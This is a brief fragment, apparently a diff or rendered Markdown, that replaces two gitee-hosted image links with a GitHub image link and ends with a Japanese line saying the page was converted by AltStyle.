![image-20210812110245884](https://gitee.com/samny/images/raw/master/summersec//45u02er45ec/45u02er45ec.png) - -![image-20210812110337585](https://gitee.com/samny/images/raw/master/summersec//37u03er37ec/37u03er37ec.png) +![image](https://user-images.githubusercontent.com/47944478/200214251-03571a05-ae55-47be-88b6-00cd5de4a737.png)

AltStyle によって変換されたページ (->オリジナル) /